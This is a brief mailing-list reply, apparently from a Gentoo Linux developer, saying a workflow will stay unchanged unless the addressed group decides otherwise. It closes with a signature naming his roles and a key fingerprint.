We're not going to change the workflow, at least not now. We'll only do
that if you guys decide on it.

-- 
Regards,
Christian Ruppert
Role: Gentoo Linux developer, Bugzilla administrator and Infrastructure
member
Fingerprint: EEB1 C341 7C84 B274 6C59  F243 5EAB 0C62 B427 ABC8


